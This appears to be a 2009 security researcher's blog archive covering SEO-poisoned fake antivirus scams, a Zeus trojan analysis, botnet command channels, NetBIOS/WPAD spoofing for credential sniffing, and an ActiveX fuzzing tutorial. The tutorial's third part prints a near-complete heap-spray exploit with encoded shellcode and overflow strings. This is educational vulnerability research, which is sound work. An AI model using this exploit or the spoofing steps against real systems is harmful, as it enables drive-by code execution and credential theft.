Somebody once said..

"If you convince people that the wheel isn't right, they will allow you to re-invent it"

Wednesday, December 30, 2009

Digging deep into BlackHat SEO - Part2

Picking from where we left-off last time, I decided to dig deep into how the whole fake AV scam was being done. So, I fired up Wireshark as I started to browse the Google search results for Brittany Murphy.

Wireshark Capture of my Google search

After clicking on the poisoned search result, we first land on a page that is just a html page with all the junk related to the Google search query. Depending on your internet speed, you may or may not see this page as you are quickly redirected to the Fake AV scanning page.

Now, this intermediate SEO page is very interesting ! It seems the bad folks are pretty clever. The content that we see on this page is dynamically generated. Here is the actual query -


So, I decided to play around and changed the query to something else, like a more recent news of terrorist Abdul Mutallab – Nigerian suicide bomber and surprise surprise ! …


What is happening is that there is smart script running behind scenes that creates dynamic content based on the parameters passed to it. It probably gets the search related content from Google in the backend and creates a page like the one above. Then Google’s web crawlers along with tools like XRumer do the rest !

There are two links or redirects embedded in this HTML source. First one appears to go to some blogger site. But looking at the HTTP Request you see referrer being set for it and most likely happens to be a tracker to keep a log of hits being made to the page.

The second request appears to go to the same PHP page on the same malicious server, but this time the parameter is different. So the query looks like this -

Notice how the “q” changed to “red”, probably meaning “redirect” and in response we get a nice -

window.location = “http://mal-url-2/?code=944

Bang ! This is the fake AV page. So, as I said before, you may or may not see all this action happening and simply land up on the Fake AV web page. So the whole flow happens like this -

Flow chart explaining the whole redirect process

The Fake AV site contains a bunch of JavaScript's (with funky names like drugndrop.js :) ! ) that are designed to show as if a real Antivirus is scanning your PC. Even the filenames shown during the scan and hardcoded in Java arrays :P ! Finally if you click anywhere on the page, you end up getting a so called “installer” which is a downloader Trojan. That request looks like this -

This was just one of the type of Fake AV campaigns that I have shown above. Some of them are more sophisticated. E.g. the names of the JavaScript files are random and different each time the page is accessed, thus making it difficult to block using network based signatures.

All this appears to be part of a kit that is being used by lot of bad guys sitting probably in Russia or Ukraine. Also, the parameters like “adv” might be affiliate id’s given to different gangs for spreading this Fake AV campaign. The downloaded binaries are Rogue AV software’s that display misleading alerts regarding computer problems in order to convince users to purchase it.

This whole SEO pages and Fake AV hosting websites keep moving with new domains being registered every now and then. So, next time you are searching for some “Breaking news”, be careful. Have a Happy and Safe and malware Free new year ! :)

Thursday, December 24, 2009

Digging deep into BlackHat SEO – Part1

It was used before for tragic news and has been seen once again now when actress Brittany Murphy passed away over the last weekend. Cybercriminals have been very effectively using SEO techniques to download malware on users machines who are trying to browse Internet looking for latest breaking news.

A simple Google search for “Brittany Murphy death” reveals some interesting search results. After the first two-three valid results, there are some mysterious links that at first seem very valid based on the preview text you see in the results.

Fig1: Google search results for Brittany Murphy

There is no way any average user can figure this out but when you actually click on one of such links, it takes you to some completely different URL and often through multiple redirects.

This is all done using Search Engine Optimization (SEO) techniques. The bad guys first create a page and dump all the popular sentences surrounding a breaking news like – “Airline crash” or “Michael Jackson death” onto that page. They also inject an iframe on the same page that will have one or more redirects to a malicious web page. Then using special SEO tools like XRumer they increase their page ranking by spamming their URL all over the internet.

When you click on one such poisoned search result, suddenly out of no where there will be a windows pop-up alert on your screen -

Fig2: Security Warning pop-upFig2: Security Warning pop-up

Ultimately you end up landing on a page that first seems like an Antivirus which is scanning your local machine but is in fact a very cleverly designed web page.

Fig3: Windows Vista Look'n'feel AV

So depending on which OS you are running, the malicious webserver shows you a corresponding look and feel type of Antivirus program. This one above shows a Vista/Win7 look and feel to it where as if you are running WinXP you get this -

Fig4: Windows XP Look'n'feel AV

If you look closely, it is completely designed to trick a user into believing that a Antivirus is scanning the PC. If you are an average Internet user, you won’t even realize that this is being rendered through Internet Explorer ! That is some clever use of HTML and JavaScript code ;)

At this point, irrespective of where you click, you will be prompted to download and install a setup file which is nothing but a downloader Trojan. It downloads Rogue Antivirus program which not only have a look and feel of popular AV programs but also have funky names like “Antivirus 2010” or “PC Protect 2010”. But before you can say clean, it will prompt you for registration which can be anywhere from 30$ to 80$ :P !

This trick of threatening the a victim by showing how infected his PC is, works out rather well. A lot of not-so-tech-savvy people fall for such kind of tricks and the bad guys seem to be earning a lot. The Rogue AV products keep changing their names and so do the various domains that host these malicious pages. This has been one of the very popular attack vector for malware distributers in 2009.

In the next part I will show you what all things go behind the scene in these type of attacks.

Stay tuned and Merry Christmas ! :)

Wednesday, December 2, 2009

NetBIOS Spoofing

The other day I came across a post at that spoke about an interesting way of using NetBIOS name service for doing MiTM attack. The author showed how his tool nbpoison could be used to inject false NetBIOS information on the wire and spoof other hosts.

This is very interesting form of doing MiTM as there is no arp-spoofing involved and that is good, since every Tom, Dick and Harry’s device in the network today detects/blocks arp-poisoning kind of attacks. Also, arp-spoofing is way to noisy and can easily give away attackers presence in the network. Not to mention that its a old-school attack that has been there for quite some time now.

So, I decided to explore this and have some fun using the nbtools and figure out what all attacks can be made possible in my Lab. I have in all 3 machines in my lab - 2 WinXP Hosts and 1 Linux host which acts as the gateway for the windoze boxes. As the author has mentioned, this attacks are more useful in hotels or conferences where there are internet kiosks with captive portal authentication mechanisms.

Scenario 1: DNS Choking

This attack is useful when, for some reason, DNS server on a network is not reachable. There could be multiple possibilities -either uplink of the switch you are connected to is (purposely) physically disconnected or network/firewall miss-configuration or DNS server/service itself is down. Even some captive portals prevent access to any resources before you authenticate. So, if the DNS server is not available, as a last resort, Windoze will fall back to NetBIOS name resolution and this is where we can 0wn the box.

So, as you can see, webserver on the Linux box was used to host the fake page which could have been anything from fake captive portal logins to fake Gmail login page to trick the user into entering his credentials. In the above scenario, I had blocked all connections from the victims ( machine using iptables on the gateway (Linux Box). FYI, the nbpoison tool can be run on any machine and need not be on the gateway.

Scenario 2: Abusing WPAD Requests

This type of attack is useful when browsers have the “Automatically detect settings” enabled in the “LAN Settings” menu. IE and Firefox both have this setting in order enable network administrators to automatically configure proxy settings. This is made possible using WPAD (Web Proxy Auto Discovery) protocol which also uses NetBIOS requests to look for the “wpad.dat” file. This is nothing but a simple plain-text configuration file that tells the browser which proxy to connect to for browsing the internet.

So, here we use the famous “sslstrip” to force HTTPS connection to HTTP and sniff passwords in clear text. Like before, we use the webserver on the Linux box to host the wpad.dat file which redirects the victims browser to sslstrip (running on port 8080) and we get to see all the good stuff :) !

The possibilities in this scenario are endless. We could use our own proxy, something like Paros to completely manipulate the victims browsing experience. But I will leave all the evil thinking to the reader as an exercise ;)

** DISCLAIMER: This is meant as a pure instructional tutorial. I am not responsible for the damages caused by any script-kiddies stupidity or lack of understanding thereof. No harm in any form was caused to anybody in the making of this tutorial.

Friday, November 20, 2009

Dissecting Zeus Botnet...

Posting after a long time.. was quite busy with some presentations to make as well as with my Protocol Fuzzer script which should be ready soon.

Anyways, the Zeus Botnet has been around for quite some time now and has gained some attention with its Internet Banking password stealing campaigns and Zeus Crimeware Kit ! Recently I received a sample which happened to be one of the Trojans belonging to this family.

“uk.exe” as it being distributed around in the wild initially seemed something else as VirusTotal results reported a rather poor detection percentage by AV vendors and also a different name like Trojan.Meredrop or Bancos.lgi. At the time of this analysis, only 2 of the major five AV companies were able to detect this Trojan and Microsoft reports suggested it as a downloader.

But, when I started up with my usual dynamic analysis, things were a little different. I had no idea that I was dealing with Zeus Botnet Trojan. This Trojan has a root kit functionality and it injects itself into one of windows processes to avoid detection. As soon its executed, the orginal process (uk.exe) exited and soon the Trojan became part of svchost.exe as expected. It then connected to “” like any typical downloader over HTTP.

 image Fig1: Trojan communication

As I was looking at wireshark trying to search patterns to write IPS signature, I noticed that everything was encrypted :( A little disappointed, I started digging in deeper looking at File/Registry changes done by the malware to see if I could locate the downloaded stuff on the disk. Even that too was encrypted and file locked by the Trojaned process itself. So, as usual when nothing works google does :) .. searching for “” directly landed me to website and I realized that I was dealing with something more sinister than just a downloader.

After reading an excellent article at Threatexpert blog on the Zeus Botnet, I knew that I was dealing with “variant 4” of the Zeus Botnet and that the encrypted communication is nothing but the configuration file of the Bot. Luckily I got hold of the Zeus Decryptor tool so I didn't have to re-invent the wheel. The encryption is done using RC4 algorithm and the funny part is that the 256-bit key is stored within the Trojan exe when its built. So for the Decryptor tool to work, it has to run on the same infected machine so that it can extract the key from the  memory  of the Trojaned process.

 image Fig2 : Dumping raw data from Wireshark / Decryptor in Action

After dumping raw data from the HTTP Response into file (zeus.cfg.raw), I ran the decryptor tool to get the clear text data and was shocked to see js code in it ! When I was reading more on the Zeus functionality, I was amazed at one of the Trojans capability and that was to intercept & inject HTML code in Browser in real-time ! So, I decided to play around more with the Trojan hoping to see the password stealing process in action. After going through the fairly elaborate Java code, I figured out that it was designed to manipulate code for banking sites belonging to HSBC, Abbey Santander, Alliance & Leicester and NatWest banks – all UK based Internet banking sites.

image Fig3: The Zeus configuration file

So, I opened the NatWest website and entered some fake details for all the fields and voila ! .. Apart from the encrypted traffic, there was a HTTP request to “” submitting all the data captured in clear text ! There it was – all the credentials nicely packaged along with “ZCID” (Zeus ID) which was my machine name followed by random string. I wonder why the malware authors decided to keep this part in clear text, they might as well have had used encryption for this too – but hey, it definitely made my life easier since I could now write a IPS signature for it ! :)


Fig4: Stolen credentials being submitted to the attacker

But the ability to inject code and manipulate data in the Browser was just amazing ! I mean who thought of this thing – it just defeated everything - SSL, Secured Login everything ! As If that was not enough - it detects the virtual keyboard in use and starts taking screenshots leaving end user completely helpless !

At this moment there are Zeus Kits being sold in the wild for anywhere between $400 to $800 and mind you these are sophisticated kits with a proper User Interface and statistics logging which allow you to completely customize the Trojan as per the needs. Some guys are also selling “Zeus as a service” giving control of their botnet on rent for a few days ! :o Since each binary of the Trojan generated from the kit is designed to have different code, the criminals can virtually churn out thousands of such Trojans and that explains the poor detection rate by the AV companies.

Thursday, September 24, 2009

Interesting C&C BotNets

Gone are the days when “Command & Control” Botnets were controlled using IRC channels or web servers. These days, attackers have moved to more sophisticated techniques or rather they are taking advantage of already available public infrastructure to control their army of Bots.

One such case is that of a Bot using Google Groups for sending out the control commands. Discovered by a researcher at Symantec, this Trojan upon infecting a machine, connects to a private Google group called “escape2sun” and requests a page. This page contains encrypted commands for the Trojan that typically consist of an index number, a command line to execute, and optionally, a file to download. Now not only can the malware author control the Botnet, but he also gets all the additional features of Google groups such as version control and tracking group activity, etc. !  Smart stuff, eh ?! Read more about it here.

Other similar publically available service that is being exploited by Botnet authors is “Twitter”. Using obfuscated Twitter status messages on a account, the malware author is able to send commands to its Trojans. The Trojan works by reading the RSS feed to a particular Twitter account designated by the Botnet author.  This appears to be a direct fall out of a PoC that was presented at Defcon 17 regarding a tool called “KreiosC2”. More about this here.

But this is not the only social networking site that is being targeted by Botnet authors, other sites such as Jaiku and Tumblr are also being used. A big advantage of using such techniques is that, it will be difficult for content filtering systems to detect & stop such communication since this is legit communication to well known websites. But at the same time, the biggest disadvantage is that they are all public services, so whatever activity that the Botnet is doing is easily visible to others too !

Friday, September 4, 2009

Strange piece of Malware..

Recently I came across two strange pieces of malware – Win32/Induc.A and Win32/Skytap.A.

Well, you can’t exactly call the first one a malware because it does not do the usual malicious stuff like disabling AV’s, downloading Trojans, stealing data etc.. But it’s very interesting in the way it spreads. Win32/Induc.A is the first of its kind malware that affects Delphi compilers. For those who don’t know Delphi is an object-oriented, visual programming environment to develop 32-bit and Microsoft .NET applications for deployment on the Internet, Windows and Linux. So essentially, any Delphi program complied by a machine infected with this Trojan contains a copy of the Trojan itself embedded inside the program and that is how it spreads !

Now what’s even more interesting is that this smart little Trojan managed to stay undetected for more than a year from all the AV/AS vendors ! In this process, it infected lot of Delphi programs including other Malware ! :) Yes, there are variants of Win32/Bancos – a popular password stealing Trojan infected with Win32/Induc code ! We’re lucky the Win32/Induc doesn’t do anything more than just affecting Delphi compiler otherwise this could have been a whole different story. Now AV vendors claim that this was the very reason for it not getting detected for so long, but never the less, at least the malware authors got a taste of their own medicine :P !

The second malware - Win32/Skytap is again a unique Trojan whose source code was published by a Swiss software developer on his website last month. It affects users of Skype software which is an application popularly used for making voice over IP (VoIP) calls. As you might have already guessed, this Trojan can tap into Skype function calls, extract and dump audio data to files. Not only that, it also converts audio conversations to the mp3 format and encrypts it.

Win32/Skytap.A contains two components: SkyDLLInjector.exe and DLLToInject.dll. These components hook to various Windows API calls that are used in audio input and output. It then is able to intercept all audio data traveling between the Skype process and the underlying audio device making Skype's network level encryption useless ! The extracted audio data is then saved to .mp3 files and can be sent out to a remote website using backdoor component. I am sure we will soon see variants of this Trojan that will adapt to other VoIP/Messaging software as well.

Now that’s some interesting stuff I have come across after a long time :) !

Thursday, August 20, 2009

Discovering ActiveX Vulnerabilities -- Part 3 [The Exploit]

So far we have seen how to use Dranzer for discovering vulnerabilities in ActiveX objects. In this third & final part of the series we will look at creating a real world exploit from the vulnerability we discovered while fuzzing last time. This, at times, is a very challenging task. Not all vulnerabilities are that easy to exploit. It requires quite some amount of patience and luck to get things going :) !

Before we begin, I would like to tell you something more about this vulnerability. As shown from the video in part 2, it's evident that this is a case of stack based buffer overflow. We also saw that EIP & SEH both were overwritten. Now, managing to overwrite EIP, is like hitting a jackpot in Vegas or striking a gold mine for any hacker :D !!! What it means is that we can have full control of the program execution and make it do things we want.

Which also brings me to the fundamental question - So what? What's the big deal in getting this control ? In short, why am I reading this tutorial ? ;) Well the reason is, in real life something like this would get translated into letting the bad guys get control of your machine. A malicious hacker with not-so-well intentions will execute a JavaScript that exploits this ActiveX control & in turn execute a small shellcode that downloads malware onto your machine without you even noticing it. These are called as "Drive-by web attacks" that often exploit vulnerabilities in browser plugins such as adobe Flash player or PDF readers to install malware on innocent users browsing the internet.

And this is exactly what I am going to do here. But first we need to identify what part of our evil.html is actually overwriting the EIP and SEH. Once we identify that, our life is much easier. I will show how it was done in my evil.html and then you can apply the same logic to yours or any other vulnerability you know. My evil.html looks something like this -

Fig 1: My evil.html as generated by dranzer

One of the ways to do this would have to been to trace back the code in Olly using breakpoints. But a much simpler and faster way to do it is to alter the code in such a way that we get to see it in Olly itself. If you look closely, all the variables in the properties have a long string of "x" in them, which is why you got "00780078" in EIP (remember, unicode representation?). So, instead of using "x", we replace each variable with a unique string that can be identified when we debug, and save it as evil2.html like this -

Fig 2: Modified evil2.html

Now repeat the same process of executing this in IE as we did in part 2 and have a look at the registers. This time, depending on the character in EIP you will come to know the exact variable that is causing the overflow. You can even modify the number of characters inside each of the variables to narrow down to the last 2 chars that overwrite EIP when exception occurs. This is a fast and very effective method of identifying which part of the code causes the overflow. Next step now is to code the exploit.

Now, a buffer overflow vulnerability can be exploited in 100 different ways - I am going to show only one method of doing it :P ! We will use the famous Heap-spraying technique for coding the exploit. I will not discus that in details here, you can google it yourself. This method is more common with web browser vulnerabilities such as this one and involves use of JavaScript to spray (paint) the Heap with the shellcode you want to execute. Once our shellcode is all over the memory, we use the overflown EIP to "jump" to the heap area and hope to execute our shellcode.

Talking of shellcode, I have used a simple shellcode here to execute calc.exe from Metasploit Framework. One small catch here is that in order for our Javascript to load this shellcode in memory it has to be in unicode ! Don't worry, for every problem there is already a solution :) You can learn more about converting shellcodes to unicode here. So, assuming you have the shellcode ready, we will create a block of NOP+shellcode and spray it on the heap by declaring an array in Javascript. Then we modify our variable (one which causes the overflow) in such a way that EIP gets overwritten with "0c0c0c0c" and effectively we jump to our NOP+Shellcode. The whole exploit should look something like this -

<SCRIPT language="javascript">
shellcode = unescape(
"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +
"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c" +
"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831" +
"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955" +
"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b" +
"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b" +
"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44" +
"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35" +
"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530" +
"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b" +
"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c" +
"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63" +
"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f" +
"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377" +
"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f" +
"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035" +
"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653" +
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<512;i++) memory[i] = block + shellcode;

var krapSlide = unescape("%u0c0c");
while (krapSlide.length<5000)
{krapSlide += krapSlide;}

var junkSlide = unescape("%u0x0x");
while (junkSlide.length<1000)
{junkSlide += junkSlide;}

document.write("<object id=TestObj classid=\"CLSID:{XXXXXX-XXXX-XXXX-XXXX-XXXXXXXXX}\" style=\"width:100;height:100\">");
document.write("<PARAM NAME=\"IServer\" VALUE=\""+junkSlide+"\">");
document.write("<PARAM NAME=\"IFailLink\" VALUE=\""+krapSlide+"\">");

Note that I am using only 2 variables here, which I know are causing the overflow based on results of my evil2.html debugging. Rest is pretty much standard Heap-spraying code you will find on most of the ActiveX exploits. Now, save that file as "0wned.html" and execute it in IE. Here is the whole thing in action -

Yay !! You've have officially been pwned :) !! In my case I am using IE 7 on WinXP SP3. Normally, in IE 8 or above you would get the "ActiveX content blocked" bar on top and you need to allow the content to run for the exploit to work. Also, notice how the IE window just disappears. This is because in the process of overwriting registers, we destroyed the exception handler(SEH) too ! You can avoid the IE crash by writing your own SEH code thus not letting the end user know anything ever happened. But I will leave that to you as an exercise.

Hope you make good use of what you've just learned. This by no means is a comprehensive tutorial. I tried to explain you everything in short. The actually process of discovering and exploiting may take days and months of hard work. Just a suggestion to all readers who are learning vulnerability research - "Always follow good principles of vulnerability disclosure. If you happen to discover new vulnerabilities, always try and work with the vendor first to fix it and then disclose the information to others".

Questions/Suggestions/Comments welcome ! :)

Tuesday, August 18, 2009

Credit Cards for sale ??

Ever wondered what do malware authors gain by writing malicious code ?? Well, if this question was asked a decade ago, the answer would be slightly different than what it is today ! The so called "underground" scene was totally different from what it is today. Those days it would be for fun or showing of real hacker skills. Now-a-days it's just about earning quick bucks and big bucks !!

Like stealing credit card numbers and bank account information for instance. Can you believe there are websites that openly sell stolen credit card numbers ?!! The way this works is - malware authors generally write password stealing bots that have a keylogger installed in the infected machine that records information entered inside your browser. This information is then silently sent out through a backdoor channel to the bad guys who control the bot and gather such information from thousands of infected machines. The information is either traded individually or they offer control of the bot to further cyber criminals who in-turn use the bot to steal more information to sell in the black market.

Fig 1: Credit Card information sale on forum

Researchers claim that upto 400 new credit card numbers appear everyday for sale !! That's a big number. The guys who sell these numbers even offer a 24 hour replacement guarantee incase the number is not working as well as technical support in multiple languages ! I am completely amazed as to how openly this is being advertised on the internet. Such sale happens on website that are generally hosted as a blog or on forums.

Fig 2: Blog offering stolen Credit Card & CVV numbers

Prices of these Credit Card numbers vary as per country ranging from as low as a few cents to 35$ for some European countries. Not only Credit Card numbers but bank account credentials are also traded online for anywhere from $10 to $1,000, and "full identities"—which include date of birth, address, and social security and telephone numbers—selling for between $1 and $15. This whole thing is a business - a well setup and well paid one !

Fig 3: Banking accounts for sale

It's not that these things haven't been tracked and taken down, but every time a bot network is brought down, a new one comes up. Business is good. Internet criminals operate with de facto immunity. The pool of vulnerable computers to exploit remains massive. Affected customers get away with refunds from banks and banks get it from their insurance companies. Antivirus researchers keep coming up with signatures to detect the bots, whereas the cyber criminals are always one step ahead in creating new variants ! The target financial institutions still treat their crime as acceptable loss. It's a endless cycle :(

All we can do is be a little more careful when it comes down to Internet banking ! BTW.. for those who thought using virtual keyboard for entering your netbanking username password was safe - think again ! There is a software code called Briz that captures the pixels around the cursor, the very pictures of the characters you are clicking on the virtual keyboard ! Nothing in this cyberworld is secure... EVER !

Wednesday, August 12, 2009

Discovering ActiveX Vulnerabilities -- Part 2 [Fuzzing]

So, continuing from where we left of last time, we will be looking at the Dranzer fuzzing tool in detail in this part. In case, you landed here directly and are wondering what this is all about, I suggest you have a look here first.

Dranzer is a well documented tool and I also suggest you have look at their documentation before starting with this so that you will be familiar with it in general. It's a very simple yet powerful tool. So, assuming you have read the first part, you should now have with you a fresh WinXP machine with Dranzer, OllyDbg, a text editor installed and the ActiveX "Classid" you want to fuzz. A note here, "Classid" is sometimes referred to as the "GUID", so do not get confused. They both mean the same thing.

All right, since Dranzer is a command line tool, fire up your command prompt and go to the Dranzer default directory which is "C:\Program Files\Dranzer\Dranzer\Release". Create a text file say "CLSID_to_test.txt" and add your ActiveX classid to that file. It should look something like this - "{EFB46ED3-8FD8-...}". If you have multiple classid's to fuzz you can add them one below the other in this file. Save the file.

Step 1: Run Dranzer with the following parameters - "Dranzer.exe -i CLSID_to_test.txt -t". You should get something like this on the screen -

Fig 1: Running Dranzer from command prompt

The "-t" switch basically tells Dranzer to test the "Interfaces Properties and Methods" for the ActiveX control. In my case all the tests passed, so nothing interesting here. Please note that I have purposely censored the ActiveX control information since the vulnerability has not been patched yet. In case you get a failed test here, you can directly go to step 3. You can also use the "-b" load in browser option, but frankly I haven't found it that useful.

Step2: Next, let's check the ActiveX control's "PropertyBag" using the following command - "Dranzer.exe -i CLSID_to_test.txt -p". This is what I got -

Fig 2: Dranzer detecting crash

Looks like we got a crash ! Now Dranzer tries to gather as much information about the crash as possible and prints it on the console. If you happen to find that cumbersome, you can always use the "-o filename.log" switch to save the output to a log file and view it later. Coming back to my crash, Dranzer says it's a "Exception Access Violation". Now as hackers or vulnerability researchers, a memory access violation is thing you really want to see, trust me ! ;) .. In lay mans terms it means something is abnormal and that some registers were arbitrarily overwritten with junk when IE tried to parse the file generated by Dranzer.

Step3: To see if the access violations can be exploited or not we need to use a debugger, which will allow us to debug the crash in detail as well as give us more information on what is being overwritten. Whenever Dranzer detects a crash, it conveniently saves the code that caused the crash in a html file in it's directory. The name of that file is the {classid}.html and is nothing but the Proof-of-Concept (PoC) for the vulnerability. In my case I have renamed the file as evil.html. Since it will be tedious to explain working of Olly using screenshots, I decided to make a small flash movie of it. Hopefully, it will be much easier to understand by watching how it's done.

What I am doing here is basically opening IE from within the debugger which will help us see the state of various registers as IE crashes. As you can see, along with the registers the Structured Exception Handler (SEH) as well as Execution pointer (EIP) gets overwritten. Those are typical symptoms of a classic stack based Buffer overflow vulnerability. In the video I also showed you how to use the "Call Stack" command in Olly to trace the vulnerable function which in this case is wcscpy() and which also happens to be the unicode version of strcpy(). These functions are known to cause overflows when used improperly. By adding breakpoints and repeating the same steps you can further trace the vulnerable code.

So, now you have seen how Dranzer can be used discover flaws in ActiveX components as well as how to use Olly to debug crashes. There are some other options with Dranzer as well which I will leave it to you to explore. In Part 3, I will show how we can use this information and convert the PoC into a real world exploit.

Hope you found this useful. Remember, discovering vulnerabilities needs tremendous amounts of patience. It may not be so easy for you to find a vulnerability every time or even to debug it for that matter, so keep trying !

Happy fuzzing :) !

Tuesday, August 11, 2009

Discovering ActiveX Vulnerabilities -- Part 1 [ Introduction ]

Recently, I discovered a vulnerability in a ActiveX control. Before starting with the discovery, I had absolutely no clue as to how to discover and exploit vulnerabilities in ActiveX. I learned the hard way, so finally I decided to make a small tutorial that could make life easier for guys like me :) ! In this 3 part series, I will be covering how to use ActiveX fuzzers to find vulnerabilities in COM Objects. I won't be covering all the basics in details, but I will show you how to discover vulnerability using a Fuzzer and then how to code a PoC or exploit for it. This tutorial assumes that you have a basic understanding of how debuggers work and know how to use them.

Ok, let's start with a quick round of basics for those who don't have a clue as to what I have spoken so far. So, what's fuzzing ?
"Fuzz testing or fuzzing is a software testing technique that provides invalid, unexpected, or random data to the inputs of a program. If the program fails (for example, by crashing or failing built-in code assertions), the defects can be noted." -- Wikipedia
When you apply that terminology to ActiveX or COM Objects it's called ActiveX fuzzing. So, what's the big deal you may ask. Well, these COM objects in some cases are exposed through Internet Explorer. That makes them vulnerable and easy targets for exploitation on the internet. By using a specially crafted web page, an attacker may exploit the vulnerability in a ActiveX control and execute arbitrary code on the victims machine, as you will see by the end of this tutorial :) !

Basically, I will show you how I discovered the vulnerability, what steps I took to debug it and finally come up with the exploit. Unfortunately, I can't disclose too much details about the vulnerability itself as the vendor is still working on a fix. Never the less, you can definitely use the same technique and apply it on other ActiveX objects to discover new bugs as well ! In this part, I will cover the basic introduction. In the second part I will show you how to use the tools to discover a vulnerability in a ActiveX control and in the third part I will show you how to code a exploit for the vulnerability that we have discovered.

For the tutorial, we will be using tools such as Ollydbg, Dranzer, COMRaider and your favorite text editor (mine is Notepad++). So, go get these installed on your system and get yourself familiarized with these tools. I will not spend time on that here otherwise this tutorial will become thrice its size :P ! There are lot of ActiveX Fuzzing tools out there but my personal favorite is Dranzer and COMRaider. Again, you could use the debugger of your choice, it's just that I happen to know Olly better. I would also recommend a clean and fresh Windows environment to start with. Fuzzing often tends to use up a lot of resources, so I would suggest using a clean windows setup with minimum software installed on it. Avoid using Antivirus when fuzzing as it will futher slow it down.

Allrighty, to begin with the fuzzing, we first need to know the class identifier for the COM object we are trying to fuzz. Every ActiveX object has a "Classid" or "clsid" which is a unique registry-identifying component that is used to identify an ActiveX control. The "Classid" is embedded in the webpage code using "object" tags. Internet explorer processes the "object" tag in the HTML code and then checks to see if the COM object is installed on the system. If present, it will invoke it and start using the methods in the class as per the code.

Typically it's the methods inside a particular class, that can have some vulnerability due to improper coding. So, to see the methods supported by the ActiveX control we will use COMRaider. There are multiple ways of doing this - if you know the classid of the software you are trying to Fuzz, you can use it directly in COMRaider or you could search for the .ocx/.dll file directly from the location where the control was installed (like Program files). Once you have entered the required information you can view the different methods supported by that ActiveX control. COMRaider has a excellent GUI and is great tool to find out information about ActiveX control you are trying to use or fuzz.

Fig 1: Example showing ActiveX info in COMRaider

Next, you can right-click any of the methods or fuctions and choose to fuzz the library or the interface, and start fuzzing - but we will not use COMRaider for this. This is where Dranzer comes into the picture. It's much much faster than COMRaider when it comes down to fuzzing but its a command line tool. Note that Dranzer can also give you information about the COM object you are trying to fuzz but that information is limited. So, I often use combination of these two tools for fuzzing.

So, that's it folks for now, I will see you again in the Part 2 where I will cover Dranzer in details as well as using Olly to debug IE crashes.

ActiveX -- Introduction to using ActiveX on the web
OllyDbg -- The Olly debugger for debugging and disassembly.
Dranzer -- The Dranzer ActiveX Fuzzer
COMRaider -- COMRaider ActiveX Fuzzer

Wednesday, July 15, 2009

It's raining 0day's...

Whew.. ! Last 10 days have been quite busy for security folks like me. There have been 3 incidences of 0day's being discovered recently. It all started with the DirectX ActiveX vulnerability which I blogged previously. Then later, an Microsoft office web component ActiveX vulnerability was observed to be exploited in the wild. The list of domains hosting the Microsoft exploit is published & maintained at sans, so in case you are not too sure of a URL or domain, you can look it up there.

And today it's the 0day in latest Mozilla Firefox browser (3.5) ! Wow.. that's just too many goodies for the bad guys to pwn you :) ! Though there are no known cases of this vulnerability being exploited in the wild yet, it's just a matter of time. It's a standard heap-spraying kind of an exploit, but a little hard to make it reliable. I doubt it will be that popular with the bad guys mainly for two reasons - firstly, the code execution works only with WinXP SP2 - it just crashes the browser with SP3 and secondly, Firefox 3.5 has been recently released so not sure how much of a audience will be there for the bad guys. A patch for this is in process but has not been released yet so the only workaround right now is to disable JIT in the Javascript engine. Refer to the advisory here for more details on how to do that.

As if this wasn't enough, the anti-sec fellows are all over the Full-disclosure mailing lists and apparently they claim they have 0day's for SSH and Apache web server. Now, a lot of people think that these are all rumors since very little evidence has been posted regarding the SSH exploit. But they have already hacked into some websites like imageshack and astalavista to prove their point, so you never know ! These so called anti-sec fellows are now targeting and Milw0rm and are openly threatening to shut them down. While I am not completely against their philosophy of vulnerability disclosure, hacking into somebody's box and executing "rm -rf /" is absolutely not the way of tackling this issue !

So, my dear friends it's never to late to patch and upgrade you systems. Firefox is a amazing browser but that doesn't mean it won't be targeted.

Update1: The Mozilla vulnerability is fixed in 3.5.1, so it's time to upgrade your browser !

Update2: There is a adobe flash 0day on the loose again ! .. The rate at which these 0day's are coming these days, looks like we will have to coin a new term for it ! :P .. Anyways, the exploit is delivered via a PDF file which is embedded with a malicious flash file - talk about new attack vectors ! Very little information is available regarding the exact vulnerability and SEO has already started doing its damage, so please be careful with what PDF's you are viewing. Will keep you posted as the mystery unfolds..

Tuesday, July 7, 2009

Microsoft IE 0day ...Not again !?

Sad, but true. Once again MS Internet Explorer users have to run around hiding from the MPEG2 ActiveX exploit that is lurking around exploiting this new vulnerability in "msvidctl.dll". And there is still no patch available for this critical vulnerability. I think, looking at the licensing costs, Micro$oft products should come with some sort of SLA when we buy them, like maybe fixing critical vulnerability within a day or something like that. I mean its ridiculous that its been more than 48 hrs that the exploit for this vulnerability is actively being hosted on literally thousands of websites and we still don't have a patch for it !

